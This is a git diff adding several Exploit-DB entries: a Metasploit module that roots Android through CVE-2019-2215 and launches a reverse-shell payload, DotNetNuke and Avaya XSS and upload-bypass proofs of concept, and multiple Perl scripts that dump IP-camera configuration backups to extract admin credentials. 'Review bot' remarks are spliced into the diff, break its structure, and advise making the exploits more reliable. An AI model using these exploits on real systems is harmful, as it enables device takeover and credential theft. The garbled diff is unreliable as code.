diff --git a/exploits/android/local/48129.rb b/exploits/android/local/48129.rb
new file mode 100755
index 000000000..6bcf07326
--- /dev/null
+++ b/exploits/android/local/48129.rb
@@ -0,0 +1,67 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Common
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => "Android Binder Use-After-Free Exploit",
+ 'Description' => %q{
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Jann Horn', # discovery and exploit
+ 'Maddie Stone', # discovery and exploit
+ 'grant-h', # Qu1ckR00t
+ 'timwr', # metasploit module
+ ],
+ 'References' => [
+ [ 'CVE', '2019-2215' ],
+ [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
+ [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
+ [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
+ ],
+ 'DisclosureDate' => "Sep 26 2019",
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Platform' => [ "android", "linux" ],
+ 'Arch' => [ ARCH_AARCH64 ],
+ 'Targets' => [[ 'Auto', {} ]],
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
+ 'WfsDelay' => 5,
+ },
+ 'DefaultTarget' => 0,
+ }
+ ))
+ end
+
+ def upload_and_chmodx(path, data)
+ write_file path, data
+ chmod(path)
+ register_file_for_cleanup(path)
+ end
+
+ def exploit
+ local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )
+ exploit_data = File.read(local_file, {:mode => 'rb'})
+
+ workingdir = session.fs.dir.getwd
+ exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
+ upload_and_chmodx(exploit_file, exploit_data)
+ payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
+ upload_and_chmodx(payload_file, generate_payload_exe)
+
+ print_status("Executing exploit '#{exploit_file}'")
+ result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
+ 
 print_status("Exploit result:\n#{result}")
+ end
+end
\ No newline at end of file
diff --git a/exploits/aspx/webapps/48124.txt b/exploits/aspx/webapps/48124.txt
new file mode 100644
index 000000000..0620f9632
--- /dev/null
+++ b/exploits/aspx/webapps/48124.txt
@@ -0,0 +1,21 @@
+# Exploit Title: DotNetNuke 9.5 - Persistent Cross-Site Scripting
+# Date: 2020-02-23
+# Exploit Author: Sajjad Pourali
+# Vendor Homepage: http://dnnsoftware.com/
+# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
+# Version: <= 9.5
+# CVE : N/A
+# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175
+
+DNN allows normal users to upload XML files by using journal tools in their profile. An attacker could upload XML files which may execute malicious scripts in the user’s browser.
+
+In XML, a namespace is an identifier used to distinguish between XML element names and attribute names which might be the same. One of the standard namespaces is “http://www.w3.org/1999/xhtml” which permits us to run XHTML tags such as
+
+Though stealing of authentication cookies are not possible at this time (because the authentication’s cookies are set as HttpOnly by default), XSS attacks are not limited to stealing users’ cookies. Using XSS vulnerability, an attacker can perform other more damaging attacks on other or high privileged users, for example, bypassing CSRF protections which allows uploading “aspx” extension files through settings page which leads to upload of backdoor files.
\ No newline at end of file
diff --git a/exploits/aspx/webapps/48125.txt b/exploits/aspx/webapps/48125.txt
new file mode 100644
index 000000000..2c0d49dd8
--- /dev/null
+++ b/exploits/aspx/webapps/48125.txt
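Review bot: The `exploit` method fires a kernel use-after-free against whatever session it is handed without a `check` method or any target validation, and then prints `result` without deciding whether the payload actually ran — a failed attempt, or one that panics the device (a binder UAF can), is reported exactly like a successful root shell. A `check` that reads the kernel version / security patch level over the session before uploading, and a comparison of `id` output before and after the run (or waiting for the session rather than the echo), would make the outcome meaningful. `'Description' => %q{` `}` is empty; it should at least say this is the CVE-2019-2215 binder UAF and that the prebuilt ELF is read from `data/exploits/CVE-2019-2215/exploit` rather than compiled here, since that is what `local_file` points at. Note also that `payload_file` is interpolated into the single-quoted `echo '...'` argument, so a working directory containing a single quote (unusual, but session-controlled) would break the command line.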
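Review bot: The advisory breaks off at "which permits us to run XHTML tags such as" — the actual XML payload (the xhtml-namespaced element carrying the script) is missing, so the finding cannot be reproduced from this file. Add the minimal XML document, the journal upload request (endpoint and field) and how the uploaded file is served back (content type and origin), since serving the XML from the application origin is what makes the script run in a victim's browser. The "Version: <= 9.5" header should also say which build was actually tested.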
@@ -0,0 +1,70 @@
+# Exploit Title: DotNetNuke 9.5 - File Upload Restrictions Bypass
+# Date: 2020-02-23
+# Exploit Author: Sajjad Pourali
+# Vendor Homepage: http://dnnsoftware.com/
+# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
+# Version: <= 9.5
+# CVE : N/A
+# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175
+
+The DNN has a file upload module for superuser. As a superuser, you can upload files with the following formats — “jpg, jpeg, jpe, gif, bmp, png, svg, ttf, eot, woff, doc, docx, xls, xlsx, ppt, pptx, pdf, txt, xml, xsl, xsd, css, zip, rar, template, htmtemplate, ico, avi, mpg, mpeg, mp3, wmv, mov, wav, mp4, webm, ogv”.
+
+As a normal user you are allowed to upload files with “bmp,gif,ico,jpeg,jpg,jpe,png,svg” extensions. The same file upload module used for superuser is reused for normal users with extra validation for a few additional extensions e.g. CSS extension is not allowed.
+
+Unfortunately, only for superuser, whitelisted extension check is performed at the server end. For normal users, extra extension validation is performed at client-side only. Hence, a low privileged normal user can bypass the client-side validation and upload files with extensions which are allowed only for superuser only.
+
+For example, a normal privileged user can upload a file with extension which is allowed only for superuser, by executing the following code on a browser’s console (in the tab that manages profile’s page has opened). This attack may also be performed using proxy tools such as Burp, ZAP etc.
+
+dnn.createFileUpload({
+ "clientId": "dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_FileUploadControl",
+ "moduleId": "",
+ "parentClientId": null,
+ "showOnStartup": true,
+ "folderPicker": {
+ "selectedItemCss": "selected-item",
+ "internalStateFieldId": null,
+ "disabled": false,
+ "selectItemDefaultText": "",
+ "initialState": {
+ "selectedItem": {
+ "key": "0",
+ "value": "My Folder"
+ }
+ },
+ "onSelectionChanged": []
+ },
+ "maxFileSize": 299892736,
+ "maxFiles": 0,
+ "extensions": ["jpg", "jpeg", "jpe", "gif", "bmp", "png", "svg", "ttf", "eot", "woff", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "xml", "xsl", "xsd", "css", "zip", "rar", "template", "htmtemplate", "ico", "avi", "mpg", "mpeg", "mp3", "wmv", "mov", "wav", "mp4", "webm", "ogv"],
+ "resources": {
+ "title": "Upload Files",
+ "decompressLabel": "Decompress Zip Files",
+ "uploadToFolderLabel": "Upload To:",
+ "dragAndDropAreaTitle": "Drag files here or click to browse",
+ "uploadFileMethod": "Upload File",
+ "uploadFromWebMethod": "From URL",
+ "closeButtonText": "Close",
+ "uploadFromWebButtonText": "Upload",
+ "decompressingFile": "Decompressing File",
+ "fileIsTooLarge": "File size bigger than 286. Mb",
+ "fileUploadCancelled": "Upload cancelled",
+ "fileUploadFailed": "Upload failed",
+ "fileUploaded": "File uploaded",
+ "emptyFileUpload": "Your browser does not support empty file uploads.",
+ "fileAlreadyExists": "The file you want to upload already exists in this folder.",
+ "uploadStopped": "File upload stopped",
+ "urlTooltip": "Enter Resource URL like https://SomeWebSite.com/Images/About.png",
+ "keepButtonText": "Keep",
+ "replaceButtonText": "Replace",
+ "tooManyFiles": "You cannot upload more than {0} file(s) at once.",
+ "invalidFileExtensions": "Some selected files with invalid extensions are excluded from upload. 
 You can only upload files with the following extensions: bmp, gif, ico, jpeg, jpg, jpe, png, svg.",
+ "unzipFilePromptTitle": "Unzip Information",
+ "unzipFileFailedPromptBody": "

[COUNT] of [TOTAL] file(s) were not extracted because their file types are not supported:

[FILELIST]
", + "unzipFileSuccessPromptBody": "

[TOTAL] of [TOTAL] file(s) were extracted successfully.

", + "errorDialogTitle": "Error" + }, + "width": 780, + "height": 630, + "folderPath": dnn.dnnFileUpload.settings.dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_dnnFileUploadScope.folder, + "parameters": {} +}); \ No newline at end of file diff --git a/exploits/hardware/webapps/48105.txt b/exploits/hardware/webapps/48105.txt new file mode 100644 index 000000000..99c5fccef --- /dev/null +++ b/exploits/hardware/webapps/48105.txt @@ -0,0 +1,17 @@ +# Exploit Title: Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting +# Release Date: 2019-12-11 +# Exploit Authors: Dan Bohan, Scott Goodwin, OCD Tech +# Vendor Homepage: https://www.avaya.com/en/ +# Software Link: https://www.avaya.com/en/products/unified-communications/voip/ +# Vulnerable Version: 11.0 FP4 SP1 and before +# Tested on: 11.0.0.0 +# CVE: CVE-2019-7004 +# Vendor Advisory: ASA-2019-213 +# References: https://downloads.avaya.com/css/P8/documents/101062833 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7004 + +Avaya IP Office version 11.0.0.0 and before has a vulnerable login page (username) which is susceptible to cross-site scripting (XSS) via a POST request due to improper sanitization of user input. XSS via a post request allows for arbitrary code to be executed on the client’s system in the security context of the browser. By submitting a specially crafted username, it is possible to execute arbitrary JavaScript. + +# PoC +Username: 41529%22%2F%3E%0A%3Cscript%3Ealert%28%27XSS%21%27%29%3B%3C%2Fscript%3E +Password: Anything \ No newline at end of file diff --git a/exploits/hardware/webapps/48107.pl b/exploits/hardware/webapps/48107.pl new file mode 100755 index 000000000..1f6db55ce --- /dev/null +++ b/exploits/hardware/webapps/48107.pl 
@@ -0,0 +1,92 @@
+# Title: ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure
+# Author: Todor Donev
+# Date: 2020-02-23
+# Vendor: www.escam.cn
+# Product Link: http://www.escam.cn/search/?class1=&class2=&class3=&searchtype=0&searchword=qd-900&lang=en
+# CVE: N/A
+
+
+#!/usr/bin/perl
+#
+# ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure
+#
+# Copyright 2020 (c) Todor Donev
+#
+# https://donev.eu/
+#
+# Disclaimer:
+# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
+# caused by direct or indirect use of the information or functionality provided by these programs.
+# The author or any Internet provider bears NO responsibility for content or misuse of these programs
+# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
+# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# (Dont do anything without permissions)
+#
+# [ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure
+# [ ===========================================================
+# [ Exploit Author: Todor Donev 2020
+# [ Initializing the browser
+# [ >> User-Agent => Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7.5) Gecko/20050105 Epiphany/1.4.8
+# [ >> Content-Type => application/x-www-form-urlencoded
+# [ << Connection => close
+# [ << Date => Fri, 21 Feb 2020 20:23:56 GMT
+# [ << Accept-Ranges => bytes
+# [ << Server => thttpd/2.25b 29dec2003
+# [ << Content-Length => 25003
+# [ << Content-Type => application/octet-stream
+# [ << Last-Modified => Fri, 21 Feb 2020 20:23:55 GMT
+# [ << Client-Date => Fri, 21 Feb 2020 20:23:57 GMT
+# [ << Client-Peer => 192.168.1.105:8000
+# [ << Client-Response-Num => 1
+# [
+# [ Username : admin
+# [ Password : admin
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print "\033[2J"; #clear the screen
+print "\033[0;0H"; #jump to 0,0
+print "[ ESCAM QD-900 WIFI HD Camera Remote Configuration Disclosure\n";
+print "[ ===========================================================\n";
+print "[ Exploit Author: Todor Donev 2020 \n";
+if ($host !~ m/^http/){
+ print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+ print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+ exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+ $browser->timeout(30);
+ $browser->agent($user_agent);
+# my $target = $host."/tmpfs/config_backup.bin";
+my $target = 
$host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
+print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+ print "[ >> Configuration dump...\n[\n";
+ print "[ ", $_, "\n" for split(/\n/,$config);
+ exit;
+} else {
+ print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
+ print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+ exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48110.txt b/exploits/hardware/webapps/48110.txt
new file mode 100644
index 000000000..6e7f0a326
--- /dev/null
+++ b/exploits/hardware/webapps/48110.txt
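Review bot: A `200` status is taken as proof of vulnerability and the body goes straight into `gunzip($gzipped)`, but nothing checks that the body is gzip data; a camera that answers the hidden path with a 200 HTML page (login form, generic error page) will make `gunzip` croak with a library error instead of the intended "Not vulnerable" message. Check the gzip magic before decompressing, e.g. `print "[ Exploit failed! Unexpected response body.\n" and exit unless substr($gzipped, 0, 2) eq "\x1f\x8b";`, or wrap the call in `eval`. The hex-escaped target `"\x2f\x77\x65\x62..."` decodes to `/web/cgi-bin/hi3510/backup.cgi`; writing it literally, as the commented-out `/tmpfs/config_backup.bin` line already does, makes the unauthenticated request obvious to anyone auditing the device. `verify_hostname => 0` is presumably deliberate for self-signed camera certificates but deserves a one-line comment, since it also means the dumped credentials can be intercepted in transit.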
@@ -0,0 +1,92 @@
+# Exploit Title: SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure
+# Author: Todor Donev
+# Date: 2020-02-23
+# Vendor: https://secu.jp/
+# Product Link: https://secu.jp/support/831nh1.html
+# CVE: N/A
+
+#
+# SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure
+#
+# Copyright 2020 (c) Todor Donev
+#
+# https://donev.eu/
+#
+# Disclaimer:
+# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
+# caused by direct or indirect use of the information or functionality provided by these programs.
+# The author or any Internet provider bears NO responsibility for content or misuse of these programs
+# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
+# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# (Dont do anything without permissions)
+#
+# [ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure
+# [ ===============================================================
+# [ Exploit Author: Todor Donev 2020
+# [ Initializing the browser
+# [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
+# [ >> Content-Type => application/x-www-form-urlencoded
+# [ << Connection => close
+# [ << Date => Fri, 21 Feb 2020 21:11:37 GMT
+# [ << Accept-Ranges => bytes
+# [ << Server => thttpd/2.25b 29dec2003
+# [ << Content-Length => 32333
+# [ << Content-Type => application/octet-stream
+# [ << Last-Modified => Fri, 21 Feb 2020 21:11:36 GMT
+# [ << Client-Date => Fri, 21 Feb 2020 21:12:23 GMT
+# [ << Client-Peer => 192.168.100.200:81
+# [ << Client-Response-Num => 1
+# [
+# [ Username : admin
+# [ Password : admin
+
+#!/usr/bin/perl
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print "\033[2J"; #clear the screen
+print "\033[0;0H"; #jump to 0,0
+print "[ SecuSTATION IPCAM-130 HD Camera Remote Configuration Disclosure\n";
+print "[ ===============================================================\n";
+print "[ Exploit Author: Todor Donev 2020 \n";
+if ($host !~ m/^http/){
+ print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+ print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+ exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+ $browser->timeout(30);
+ $browser->agent($user_agent);
+# my $target = $host."/tmpfs/config_backup.bin";
+my $target = 
$host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
+print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+ print "[ >> Configuration dump...\n[\n";
+ print "[ ", $_, "\n" for split(/\n/,$config);
+ exit;
+} else {
+ print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
+ print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+ exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48115.pl b/exploits/hardware/webapps/48115.pl
new file mode 100755
index 000000000..60dbc08f4
--- /dev/null
+++ b/exploits/hardware/webapps/48115.pl
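Review bot: `my $response = $browser->request($request) or die "[ Exploit Failed: $!";` can never die — `LWP::UserAgent::request` always returns an `HTTP::Response`, and a refused connection or timeout comes back as a synthesized 500 response — so every network failure falls through to `print "[ Exploit failed! Not vulnerable.\n"`, a false negative that an operator would believe. Report transport failures separately from the vulnerability verdict, e.g. `print "[ Request failed: ", $response->status_line, "\n" and exit unless $response->code == 200;`, and treat 401/403 as "patched or authenticated" rather than "not vulnerable". This file is also a complete Perl script stored as `.txt` with the `#!/usr/bin/perl` line after the comment banner, so it only runs as `perl file`, which the usage text does at least state.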
@@ -0,0 +1,91 @@
+# Exploit Title: SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure
+# Author: Todor Donev
+# Date: 2020-02-23
+# Vendor: https://secu.jp/
+# Product Link: https://secu.jp/support/831.html
+# CVE: N/A
+
+#!/usr/bin/perl
+#
+# SecuSTATION SC-831 HD Camera Remote Configuration Disclosure
+#
+# Copyright 2020 (c) Todor Donev
+#
+# https://donev.eu/
+#
+# Disclaimer:
+# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
+# caused by direct or indirect use of the information or functionality provided by these programs.
+# The author or any Internet provider bears NO responsibility for content or misuse of these programs
+# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
+# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# (Dont do anything without permissions)
+#
+# [ SecuSTATION SC-831 HD Camera Remote Configuration Disclosure
+# [ ============================================================
+# [ Exploit Author: Todor Donev 2020
+# [ Initializing the browser
+# [ >> User-Agent => Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b3pre) Gecko/20081208 SeaMonkey/2.0a3pre
+# [ >> Content-Type => application/x-www-form-urlencoded
+# [ << Connection => close
+# [ << Date => Fri, 21 Feb 2020 20:36:59 GMT
+# [ << Accept-Ranges => bytes
+# [ << Server => thttpd/2.25b 29dec2003
+# [ << Content-Length => 25760
+# [ << Content-Type => application/octet-stream
+# [ << Last-Modified => Fri, 21 Feb 2020 20:36:57 GMT
+# [ << Client-Date => Fri, 21 Feb 2020 20:37:01 GMT
+# [ << Client-Peer => 192.168.1.208:80
+# [ << Client-Response-Num => 1
+# [
+# [ Username : admin
+# [ Password : admin
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print "\033[2J"; #clear the screen
+print "\033[0;0H"; #jump to 0,0
+print "[ SecuSTATION SC-831 HD Camera Remote Configuration Disclosure\n";
+print "[ ============================================================\n";
+print "[ Exploit Author: Todor Donev 2020 \n";
+if ($host !~ m/^http/){
+ print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+ print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+ exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+ $browser->timeout(30);
+ $browser->agent($user_agent);
+# my $target = $host."/tmpfs/config_backup.bin";
+my $target = 
$host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
+print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+ print "[ >> Configuration dump...\n[\n";
+ print "[ ", $_, "\n" for split(/\n/,$config);
+ exit;
+} else {
+ print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
+ print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+ exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48118.txt b/exploits/hardware/webapps/48118.txt
new file mode 100644
index 000000000..876c51183
--- /dev/null
+++ b/exploits/hardware/webapps/48118.txt
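Review bot: The credential extraction at the end, `$config =~ /username=(.*)/` and `/password=(.*)/`, reports only the first match of each key, and the greedy `(.*)` will swallow a trailing carriage return if the dump uses CRLF endings; a backup that holds more than one account or service credential (likely for a full device config, but not verifiable from this file) silently loses everything after the first pair. Iterating over all matches, e.g. `print "[ $1 : $2\n" while ($config =~ /^(username|password)=(.*?)\r?$/mg);`, shows the operator every credential and keeps the pairs in file order. The success check `$response->code ne 200` is a string comparison on a number; it works, but `== 200` or `$response->is_success` reads as intended.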
@@ -0,0 +1,91 @@
+# Exploit Title: I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure
+# Author: Todor Donev
+# Date: 2020-02-23
+# Vendor: https://www.revotec.com/
+# Product Link:
+# CVE: N/A
+
+#!/usr/bin/perl
+#
+# Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure
+#
+# Copyright 2020 (c) Todor Donev
+#
+# https://donev.eu/
+#
+# Disclaimer:
+# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
+# caused by direct or indirect use of the information or functionality provided by these programs.
+# The author or any Internet provider bears NO responsibility for content or misuse of these programs
+# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
+# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# (Dont do anything without permissions)
+#
+# [ Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure
+# [ =====================================================================================
+# [ Exploit Author: Todor Donev 2020 -- https://donev.eu/
+# [ Initializing the browser
+# [ >> User-Agent => Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i686-pc-linux; X11)
+# [ >> Content-Type => application/x-www-form-urlencoded
+# [ << Connection => close
+# [ << Date => Sun, 23 Feb 2020 10:57:32 GMT
+# [ << Accept-Ranges => bytes
+# [ << Server => thttpd/2.25b 29dec2003
+# [ << Content-Length => 23876
+# [ << Content-Type => application/octet-stream
+# [ << Last-Modified => Sun, 23 Feb 2020 10:57:32 GMT
+# [ << Client-Date => Sun, 23 Feb 2020 10:57:44 GMT
+# [ << Client-Response-Num => 1
+# [
+# [ Username : admin
+# [ Password : admin
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print "\033[2J"; #clear the screen
+print "\033[0;0H"; #jump to 0,0
+print "[ Revotech I6032B-P POE 1920x1080P 2.0MP Outdoor Camera Remote Configuration Disclosure\n";
+print "[ =====================================================================================\n";
+print "[ Exploit Author: Todor Donev 2020 -- https://donev.eu/\n";
+if ($host !~ m/^http/){
+ print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+ print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+ exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+ $browser->timeout(30);
+ $browser->agent($user_agent);
+# my $target = $host."/config_backup.bin";
+# my $target = $host."/tmpfs/config_backup.bin";
+my $target = 
$host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
+print "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+ print "[ >> Configuration dump...\n[\n";
+ print "[ ", $_, "\n" for split(/\n/,$config);
+ exit;
+} else {
+ print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
+ print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
+ exit;
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48127.pl b/exploits/hardware/webapps/48127.pl
new file mode 100755
index 000000000..75d5687a2
--- /dev/null
+++ b/exploits/hardware/webapps/48127.pl
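Review bot: The `# Product Link:` header is empty and the `# Exploit Title:` names the device only as `I6032B-P POE 2.0MP Outdoor Camera` while the banner calls it `Revotech I6032B-P`; fill in the link and put the vendor in the title so the entry can be matched to real hardware. Two alternative targets, `/config_backup.bin` and `/tmpfs/config_backup.bin`, are left commented out above `my $target`; either try them in order and print which one answered, or delete them with a comment saying they were tested and are absent on this firmware, since as written a reader cannot tell whether they are dead code or untested hints. The live path is hex-escaped (`"\x2f\x77\x65\x62..."` is `/web/cgi-bin/hi3510/backup.cgi`); a literal string is easier to audit and to grep for in firmware.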
@@ -0,0 +1,92 @@
+# Exploit Title: Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure
+# Author: Todor Donev
+# Date: 2020-02-23
+# Vendor: https://acesecurity.jp
+# Product Link: https://acesecurity.jp/support/top/wip_series/wip-90113
+# CVE: N/A
+
+#!/usr/bin/perl
+#
+# ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure
+#
+# Copyright 2020 (c) Todor Donev
+#
+# https://donev.eu/
+#
+# Disclaimer:
+# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
+# caused by direct or indirect use of the information or functionality provided by these programs.
+# The author or any Internet provider bears NO responsibility for content or misuse of these programs
+# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
+# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# (Dont do anything without permissions)
+#
+# [ ACE SECURITY WiP-90113 HD Camera Remote Configuration Disclosure
+# [ ================================================================
+# [ Exploit Author: Todor Donev 2020
+# [ Initializing the browser
+# [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
+# [ >> Content-Type => application/x-www-form-urlencoded
+# [ << Connection => close
+# [ << Date => Sat, 22 Feb 2020 14:10:01 GMT
